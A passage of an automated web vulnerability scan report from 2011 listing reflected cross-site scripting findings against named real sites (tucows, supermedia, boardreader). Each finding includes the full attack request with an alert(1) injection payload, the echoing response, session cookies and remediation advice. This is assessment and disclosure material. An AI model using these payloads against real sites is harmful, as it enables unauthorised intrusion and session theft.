Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes5f637"-alert(1)-"80f9081ac8c/themes/03BlueMeany/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:29 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49de9"-alert(1)-"04a15e87fd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes49de9"-alert(1)-"04a15e87fd3/03BlueMeany/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:45 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3a9a"-alert(1)-"237aaaa614c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeanyc3a9a"-alert(1)-"237aaaa614c/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:55 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9f64"-alert(1)-"4bb4721a55e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeany/style.cssa9f64"-alert(1)-"4bb4721a55e HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:57:07 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86915"-alert(1)-"a2383cc0931 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes86915"-alert(1)-"a2383cc0931/themes/03BlueMeany/styles.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:23 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 942cd"-alert(1)-"ffd8d4c4a27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes942cd"-alert(1)-"ffd8d4c4a27/03BlueMeany/styles.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:31 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17188"-alert(1)-"4251e1c163 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeany17188"-alert(1)-"4251e1c163/styles.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:46 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eac0c"-alert(1)-"7fb6f8e43f1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeany/styles.csseac0c"-alert(1)-"7fb6f8e43f1 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:55 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 791b3</script><script>alert(1)</script>95b6769fb51 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comment_html.php?cid=791b3</script><script>alert(1)</script>95b6769fb51 HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:38 GMT Server: Unspecified Content-Length: 101 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:38 GMT;path=/
3.40. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e1f"><script>alert(1)</script>3606575b7cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.php?z=1&source=opensearch&a=s&q={searchTerms}&b2e1f"><script>alert(1)</script>3606575b7cc=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response (redirected)
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:52:49 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com/rss/%7BsearchTerms%7D.html?source=opensearch&b2e1f"><script>alert(1)</script>3606575b7cc=1&p=20&format=RSS2.0" /> ...[SNIP]...
3.41. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d10e'><script>alert(1)</script>2f96e732bb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.php?z=1&source=opensearch&a=s&q={searchTerms}&2d10e'><script>alert(1)</script>2f96e732bb6=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response (redirected)
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:53:00 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta ...[SNIP]... <input type=hidden name='2d10e'><script>alert(1)</script>2f96e732bb6' value="1"> ...[SNIP]...
3.42. http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /my/signup.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da9f2"><script>alert(1)</script>671f469cc02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /my/signup.html?da9f2"><script>alert(1)</script>671f469cc02=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:38 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <form name="mylogin_" action="/my/signup.html?da9f2"><script>alert(1)</script>671f469cc02=1" method="POST"> ...[SNIP]...
3.43. http://boardreader.com/pop/articles/-/-/7.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /pop/articles/-/-/7.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37ec4"><script>alert(1)</script>e3800dfbbbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pop/articles/-/-/7.html?37ec4"><script>alert(1)</script>e3800dfbbbc=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:32:07 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a class="disc" href="/s/Toilet%2Bpaper%2Borientation.html?37ec4"><script>alert(1)</script>e3800dfbbbc=1" title="Search discussions for item "Toilet paper orientation""> ...[SNIP]...
3.44. http://boardreader.com/pop/films/-/-/3.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /pop/films/-/-/3.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef06b"><script>alert(1)</script>06db0769bba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
